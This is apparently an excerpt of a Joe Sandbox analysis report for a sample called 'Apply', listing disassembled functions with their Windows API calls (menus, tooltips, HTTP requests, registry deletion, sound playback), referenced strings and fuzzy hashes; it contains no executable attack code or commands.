Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 354098117-199464113
Opcode ID: 281ea0689fa7f05dab491ee10cfe6f891dc39914ee38b45ab3fe0eeb9fb734e9
Instruction ID: f2bc0c24c06e3b4a904742883cf4a850381845656b99500fb90dab8a4d08060a
Opcode Fuzzy Hash: 281ea0689fa7f05dab491ee10cfe6f891dc39914ee38b45ab3fe0eeb9fb734e9
Instruction Fuzzy Hash: 26122B71A00219EFDB14DF94C884EAEBBB5FF45318F249199E805EB261D731ED46CBA0

Function 008530A2 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(009229B0), ref: 00893202
GetMenuItemCount.USER32(009229B0), ref: 008932B2
GetCursorPos.USER32(?), ref: 008932F6
SetForegroundWindow.USER32(00000000), ref: 008932FF
TrackPopupMenuEx.USER32(009229B0,00000000,?,00000000,00000000,00000000), ref: 00893312
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0089331E

Strings

0, xrefs: 008530B0

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: d2f3496ce09509bef81fd4cd1fa129bb2a28c48807e28b26b734273a408afc84
Instruction ID: 959f3f4fdd0c6f75ffba440fd3aef9b346c935cb386f6988b2709f81c45f2405
Opcode Fuzzy Hash: d2f3496ce09509bef81fd4cd1fa129bb2a28c48807e28b26b734273a408afc84
Instruction Fuzzy Hash: 06711730640315BFEB219F68CC49FAABF64FF05364F184216F914EA2E1C7B16918D791

Function 008E73A4 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,?), ref: 008E74B6

Part of subcall function 00857467: _wcslen.LIBCMT ref: 0085747A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 008E752A
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 008E754C
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 008E755F
DestroyWindow.USER32(?), ref: 008E7580
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00850000,00000000), ref: 008E75AF
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 008E75C8
GetDesktopWindow.USER32 ref: 008E75E1
GetWindowRect.USER32(00000000), ref: 008E75E8
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 008E7600
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 008E7618

Part of subcall function 00869B74: GetWindowLongW.USER32(?,000000EB), ref: 00869B82

Strings

0, xrefs: 008E7463
tooltips_class32, xrefs: 008E7523, 008E75A8

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 4544d9ba3d23cd70c8ad670c840eb3e0876897c78454233e2c3fe33e354e7343
Instruction ID: dabb273aefaa3468290213bad9c651e7ff1fbb156d58d2c53b649a9377bd7bd2
Opcode Fuzzy Hash: 4544d9ba3d23cd70c8ad670c840eb3e0876897c78454233e2c3fe33e354e7343
Instruction Fuzzy Hash: 5E716C74508384AFD725DF59CC48FAABBE9FB9A304F04091DF985CB261C770A946DB11

Function 008E980A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00869DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 00869DE2

DragQueryPoint.SHELL32(?,?), ref: 008E9833

Part of subcall function 008E7D3F: ClientToScreen.USER32(?,?), ref: 008E7D65
Part of subcall function 008E7D3F: GetWindowRect.USER32(?,?), ref: 008E7DDB
Part of subcall function 008E7D3F: PtInRect.USER32(?,?,008E9275), ref: 008E7DEB

SendMessageW.USER32(?,000000B0,?,?), ref: 008E989C
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 008E98A7
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 008E98CA
SendMessageW.USER32(?,000000C2,00000001,?), ref: 008E9911
SendMessageW.USER32(?,000000B0,?,?), ref: 008E992A
SendMessageW.USER32(?,000000B1,?,?), ref: 008E9941
SendMessageW.USER32(?,000000B1,?,?), ref: 008E9963
DragFinish.SHELL32(?), ref: 008E996A
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 008E9A5D

Strings

@GUI_DRAGID, xrefs: 008E99D5
@GUI_DROPID, xrefs: 008E998A
@GUI_DRAGFILE, xrefs: 008E9A0C

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 221274066-3440237614
Opcode ID: c51867b2173402fa9719c32ec2abb7ab82dfe1c60d99c9b86a128b8342d35a94
Instruction ID: 099a535e8d36f9ed73d51520aaf4a7b95fea79e86c054f92637f748e9959a5f7
Opcode Fuzzy Hash: c51867b2173402fa9719c32ec2abb7ab82dfe1c60d99c9b86a128b8342d35a94
Instruction Fuzzy Hash: 3B616971108345AFC705EF64DC85D9FBBE8FF89314F000A2EF991962A1DB70AA49CB52

Function 008CCBE5 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008CCC1F
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 008CCC32
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 008CCC46
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 008CCC5F
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 008CCCA2
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 008CCCB8
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008CCCC3
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 008CCCF3
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 008CCD4B
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 008CCD5F
InternetCloseHandle.WININET(00000000), ref: 008CCD6A

Strings

, xrefs: 008CCCE4

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: f73489c4eabd43ea4e5fe3d1d9628224774762c5f753d89654dd5f6938fe83a3
Instruction ID: 8473f1596e435841abe9e9e808fd4dec136a3abc4f433366c43272df0d11c72d
Opcode Fuzzy Hash: f73489c4eabd43ea4e5fe3d1d9628224774762c5f753d89654dd5f6938fe83a3
Instruction Fuzzy Hash: B4510AB1500748BFDB219F65CD88FAA7BB8FB04754F00842DFA4ADA250D735E9489BA1

Function 008E8C5B Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,008E63F7,?,?), ref: 008E8C7E
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,008E63F7,?,?,00000000,?), ref: 008E8C8E
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,008E63F7,?,?,00000000,?), ref: 008E8C99
CloseHandle.KERNEL32(00000000,?,?,?,?,008E63F7,?,?,00000000,?), ref: 008E8CA6
GlobalLock.KERNEL32(00000000,?,?,?,?,008E63F7,?,?,00000000,?), ref: 008E8CB4
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,008E63F7,?,?,00000000,?), ref: 008E8CC3
GlobalUnlock.KERNEL32(00000000,?,?,?,?,008E63F7,?,?,00000000,?), ref: 008E8CCC
CloseHandle.KERNEL32(00000000,?,?,?,?,008E63F7,?,?,00000000,?), ref: 008E8CD3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,008E63F7,?,?,00000000,?), ref: 008E8CE4
OleLoadPicture.OLEAUT32(?,00000000,00000000,008F0C20,?), ref: 008E8CFD
GlobalFree.KERNEL32(00000000), ref: 008E8D0D
GetObjectW.GDI32(00000000,00000018,?), ref: 008E8D2D
CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 008E8D5D
DeleteObject.GDI32(00000000), ref: 008E8D85
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 008E8D9B

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 66e6b8d610233f7b6942f87786a57f54812f6f8348df6ec6c4aeeaa2a199165f
Instruction ID: 26d58ebcd62b78055d7ef3de16e1f72d57d235aa588bc991e7922e8af0237eb9
Opcode Fuzzy Hash: 66e6b8d610233f7b6942f87786a57f54812f6f8348df6ec6c4aeeaa2a199165f
Instruction Fuzzy Hash: F2411C75600248FFDB119F65DC88EAEBBB9FF8A711F104059F919DB2A0DB70A945CB20

Function 008D2CE3 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 008D2D5F
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 008D2D6F
CreateCompatibleDC.GDI32(?), ref: 008D2D7B
SelectObject.GDI32(00000000,?), ref: 008D2D88
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 008D2DF4
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 008D2E33
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 008D2E57
SelectObject.GDI32(?,?), ref: 008D2E5F
DeleteObject.GDI32(?), ref: 008D2E68
DeleteDC.GDI32(?), ref: 008D2E6F
ReleaseDC.USER32(00000000,?), ref: 008D2E7A

Strings

(, xrefs: 008D2E14

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: ca6322e43fd2b57248e6ca35f45490ca50b8b6831f2fa08001a12e8203c93663
Instruction ID: 9704812efd125569a516d6de3edfa3d226bded285c4b482c6aadc40bc3aa6bb8
Opcode Fuzzy Hash: ca6322e43fd2b57248e6ca35f45490ca50b8b6831f2fa08001a12e8203c93663
Instruction Fuzzy Hash: B161D475D00219EFCF04CFA8D884AAEBBB6FF58310F20851AE555EB250D770A941DF60

Function 008B503F Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 008B507B
GetWindowTextW.USER32(?,?,00000400), ref: 008B50BD
_wcslen.LIBCMT ref: 008B50CE
CharUpperBuffW.USER32(?,00000000), ref: 008B50DA
_wcsstr.LIBVCRUNTIME ref: 008B510F
GetClassNameW.USER32(00000018,?,00000400), ref: 008B5147
GetWindowTextW.USER32(?,?,00000400), ref: 008B5180
GetClassNameW.USER32(00000018,?,00000400), ref: 008B51DA
GetClassNameW.USER32(?,?,00000400), ref: 008B520C
GetWindowRect.USER32(?,?), ref: 008B5284

Strings

ThumbnailClass, xrefs: 008B5152, 008B51E5

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: ab68e09ddc36bb7ddad1094bb7a8863df7d6f67232a0c943f1f62b2bfa6ec6a4
Instruction ID: 6540008cefa625861881ffc66822ac1fb19574fe3b30e9f70d5caa91acfd6045
Opcode Fuzzy Hash: ab68e09ddc36bb7ddad1094bb7a8863df7d6f67232a0c943f1f62b2bfa6ec6a4
Instruction Fuzzy Hash: 1591F831104B07AFDB08DF28C994BEAB7A9FF55304F004519FA9AC6291EB31ED56CB91

Function 008E93FA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00869DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 00869DE2

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 008E9446
GetFocus.USER32 ref: 008E9456
GetDlgCtrlID.USER32(00000000), ref: 008E9461
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 008E9509
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 008E95BB
GetMenuItemCount.USER32(?), ref: 008E95D8
GetMenuItemID.USER32(?,00000000), ref: 008E95E8
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 008E961A
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 008E965C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 008E968D

Strings

0, xrefs: 008E958B

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: b5ef7a6e889004c965bd5f69e348079a8d0f148cedc9b9e0ce231d6b89fc01f0
Instruction ID: ba6a6f6e9152578cdfad99ec5a33708a1903c3243b91de8604631120fb7e9ab0
Opcode Fuzzy Hash: b5ef7a6e889004c965bd5f69e348079a8d0f148cedc9b9e0ce231d6b89fc01f0
Instruction Fuzzy Hash: 5C81B3715083819FD711CF2AC884A6B7BE8FF9A314F04051EF989D7291D7B0D945CBA2

Function 008BC631 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(009229B0,000000FF,00000000,00000030), ref: 008BC6AD
SetMenuItemInfoW.USER32(009229B0,00000004,00000000,00000030), ref: 008BC6E2
Sleep.KERNEL32(000001F4), ref: 008BC6F4
GetMenuItemCount.USER32(?), ref: 008BC73A
GetMenuItemID.USER32(?,00000000), ref: 008BC757
GetMenuItemID.USER32(?,-00000001), ref: 008BC783
GetMenuItemID.USER32(?,?), ref: 008BC7CA
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 008BC810
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008BC825
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008BC846

Strings

0, xrefs: 008BC63E

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep
String ID: 0
API String ID: 1460738036-4108050209
Opcode ID: 77ae6e2129c6dd5bcbf4c11ddf0ecc807746fb323b31e6f6f25195dcaaef1f93
Instruction ID: acbd2b2d5a0da8ad6a7d9537c9eab4158444679f9778d3441f8aabe758d5122c
Opcode Fuzzy Hash: 77ae6e2129c6dd5bcbf4c11ddf0ecc807746fb323b31e6f6f25195dcaaef1f93
Instruction Fuzzy Hash: CA617DB090024AABDF11CF68D888AFF7BB8FB05308F144169E851E7351CB75AD15CBA1

Function 008BE1EC Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 008BE1FE
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 008BE224
_wcslen.LIBCMT ref: 008BE22E
_wcsstr.LIBVCRUNTIME ref: 008BE27E
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 008BE29A

Strings

StringFileInfo\, xrefs: 008BE26D
\VarFileInfo\Translation, xrefs: 008BE292
%u.%u.%u.%u, xrefs: 008BE378
DefaultLangCodepage, xrefs: 008BE2FD
04090000, xrefs: 008BE2D0

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: 2e021709636577a77be7b9592b99e059482fbb4f0088c751ccbc781eab4b0d92
Instruction ID: ef9c38da17704fe2a3add30ac14c221ea38a7009db20879d39e68e457ed81fc1
Opcode Fuzzy Hash: 2e021709636577a77be7b9592b99e059482fbb4f0088c751ccbc781eab4b0d92
Instruction Fuzzy Hash: A6411832A00304BEDB15A7689C87EFF77ACFF95710F508065F909E6282EB75D90196B2

Function 008DD3B2 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 008DD3E2
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 008DD40B
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 008DD4C6

Part of subcall function 008DD3B2: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 008DD428
Part of subcall function 008DD3B2: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 008DD43B
Part of subcall function 008DD3B2: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 008DD44D
Part of subcall function 008DD3B2: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 008DD483
Part of subcall function 008DD3B2: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 008DD4A6

RegDeleteKeyW.ADVAPI32(?,?), ref: 008DD471

Strings

advapi32.dll, xrefs: 008DD436
RegDeleteKeyExW, xrefs: 008DD447

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: befd33f9f70461246037e79cbb75b6eb2963bf9b4023c8fe64f59a43a7cafb8d
Instruction ID: a74e7b2b2603e3efa9616e0c7e8ac95993e5cc8ddf8b0f67e5a9f39cad0a9465
Opcode Fuzzy Hash: befd33f9f70461246037e79cbb75b6eb2963bf9b4023c8fe64f59a43a7cafb8d
Instruction Fuzzy Hash: 1B316F71901229BBDB209B64DC88EFFBB7DFF45754F004266B805E7240DB749E4A9AA0

Function 008BECF1 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 008BECF5

Part of subcall function 0086EF0E: timeGetTime.WINMM(?,?,008BED15), ref: 0086EF12

Sleep.KERNEL32(0000000A), ref: 008BED22
EnumThreadWindows.USER32(?,Function_0006ECA6,00000000), ref: 008BED46
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 008BED68
SetActiveWindow.USER32 ref: 008BED87
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 008BED95
SendMessageW.USER32(00000010,00000000,00000000), ref: 008BEDB4
Sleep.KERNEL32(000000FA), ref: 008BEDBF
IsWindow.USER32 ref: 008BEDCB
EndDialog.USER32(00000000), ref: 008BEDDC

Strings

BUTTON, xrefs: 008BED5A

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: b68c2bd061744a0a9abfad6fce66f26694f4019a86ac3b476731a92d7c3610d7
Instruction ID: f10d5baedd49a1ebe5ac993b3c9341c4920bd3988b8e0c386386a0cd881ecb18
Opcode Fuzzy Hash: b68c2bd061744a0a9abfad6fce66f26694f4019a86ac3b476731a92d7c3610d7
Instruction Fuzzy Hash: 1821A170624389BFEB205F78ECC9BA53B6DFB49B45F045014F402CA371CBB58C49AA51

Function 008BF03D Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 0085A1D4: _wcslen.LIBCMT ref: 0085A1DE

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 008BF09E
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 008BF0B4
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008BF0C5
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 008BF0D7
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 008BF0E8

Strings

play PlayMe wait, xrefs: 008BF0D2
alias PlayMe, xrefs: 008BF077
status PlayMe mode, xrefs: 008BF099
open , xrefs: 008BF04D
